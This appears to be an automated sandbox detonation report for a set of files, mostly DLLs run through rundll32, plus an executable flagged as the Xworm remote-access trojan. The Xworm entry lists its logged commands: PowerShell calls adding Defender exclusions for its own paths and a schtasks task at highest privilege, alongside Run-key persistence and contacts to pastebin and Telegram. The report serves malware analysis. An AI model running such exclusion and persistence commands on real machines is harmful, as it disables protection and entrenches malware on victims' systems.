US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:39

Platform

win10-20240404-en

Max time kernel

314s

Max time network

402s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Guna.UI2.dll,#1

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.73.50.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:46

Platform

win10-20240404-en

Max time kernel

361s

Max time network

405s

Command Line

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Processes

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Icons\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}

Network

Country Destination Domain Proto
US 8.8.8.8:53 1.0.a.d.6.8.4.c.2.6.6.6.8.4.0.e.1.0.a.d.6.8.4.c.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 253.15.104.51.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:52

Platform

win10-20240611-en

Max time kernel

311s

Max time network

390s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Backports.dll,#1

Network

Country Destination Domain Proto
SE 2.21.189.164:80 tcp
BE 2.17.107.203:80 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 104.193.132.51.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral23

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:57

Platform

win10-20240404-en

Max time kernel

314s

Max time network

395s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\All-In-One.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\All-In-One.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral24

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:57

Platform

win10-20240404-en

Max time kernel

507s

Max time network

510s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\Chat.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\Chat.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 09:00

Platform

win10-20240404-en

Max time kernel

519s

Max time network

522s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\FileManager.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\FileManager.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:49

Platform

win10-20240404-en

Max time kernel

314s

Max time network

410s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Pdb.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:57

Platform

win10-20240611-en

Max time kernel

311s

Max time network

408s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\NAudio.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\NAudio.dll,#1

Network

Country Destination Domain Proto
US 199.232.210.172:80 tcp
US 199.232.210.172:80 tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 214.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:57

Platform

win10-20240404-en

Max time kernel

496s

Max time network

501s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll,#1

Network

Country Destination Domain Proto
US 52.111.229.48:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:50

Platform

win10-20240611-en

Max time kernel

364s

Max time network

435s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp

Files

N/A

Analysis: behavioral16

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:53

Platform

win10-20240404-en

Max time kernel

391s

Max time network

447s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.Core.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:38

Platform

win10-20240611-en

Max time kernel

310s

Max time network

390s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\FastColoredTextBox.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 23.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:38

Platform

win10-20240404-en

Max time kernel

314s

Max time network

389s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Fixer.bat"

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 48.192.11.51.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:50

Platform

win10-20240404-en

Max time kernel

314s

Max time network

405s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Mono.Cecil.Rocks.dll,#1

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:54

Platform

win10-20240404-en

Max time kernel

517s

Max time network

521s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.ILHelpers.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\MonoMod.ILHelpers.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.246.116.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 81.144.22.2.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 09:02

Platform

win10-20240404-en

Max time kernel

313s

Max time network

395s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HRDP.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\Plugins\HRDP.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:46

Platform

win10-20240611-en

Max time kernel

311s

Max time network

398s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\IconExtractor.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 40.173.79.40.in-addr.arpa udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-02 22:43

Reported

2024-08-03 08:47

Platform

win10-20240404-en

Max time kernel

599s

Max time network

526s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q11111.lnk C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000\Software\Microsoft\Windows\CurrentVersion\Run\q11111 = "C:\\Users\\Public\\q11111" C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\XClient.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 60 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 60 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe C:\Users\Admin\AppData\Roaming\XClient.exe
PID 200 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 2112 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 1120 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 200 wrote to memory of 428 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe
PID 200 wrote to memory of 428 N/A C:\Users\Admin\AppData\Roaming\XClient.exe C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe

"C:\Users\Admin\AppData\Local\Temp\Icons\Outfuytftjgfuyjput.exe"

C:\Users\Admin\AppData\Roaming\XClient.exe

"C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\q11111'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'q11111'

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "q11111" /tr "C:\Users\Public\q11111"

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

C:\Users\Public\q11111

Network

Country Destination Domain Proto
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
US 138.91.171.81:80 tcp
N/A 127.0.0.1:7000 tcp
US 8.8.8.8:53 57.110.18.2.in-addr.arpa udp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp
N/A 127.0.0.1:7000 tcp

Files

memory/60-0-0x00007FFC45323000-0x00007FFC45324000-memory.dmp

memory/60-1-0x00000000007B0000-0x0000000001D32000-memory.dmp

C:\Users\Admin\AppData\Roaming\XClient.exe

MD5 767d4d113ea2e9d9886b2aa1710db7f3
SHA1 f7f779a94fb6fe0e3ee8996dff7951b3b5c7b1b0
SHA256 b06506ca596951ae4c75e43d5aba7c255c557cf5607915a214c2a3f53e97934f
SHA512 ea1f6b926b2e19d0521dc3939c247094640ba6fb10b8c0a4dbb48306c5b7e8b9a3659d4f83ead234ba3c035ae09d891d8c2c302945f48b94a4a0916d3ca7ee41

memory/200-8-0x0000000000BD0000-0x0000000000C20000-memory.dmp

memory/200-13-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/200-48-0x00007FFC45320000-0x00007FFC45D0C000-memory.dmp

memory/2112-53-0x0000013542E90000-0x0000013542EB2000-memory.dmp

memory/2112-56-0x0000013543040000-0x00000135430B6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nxnlzxju.dvx.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
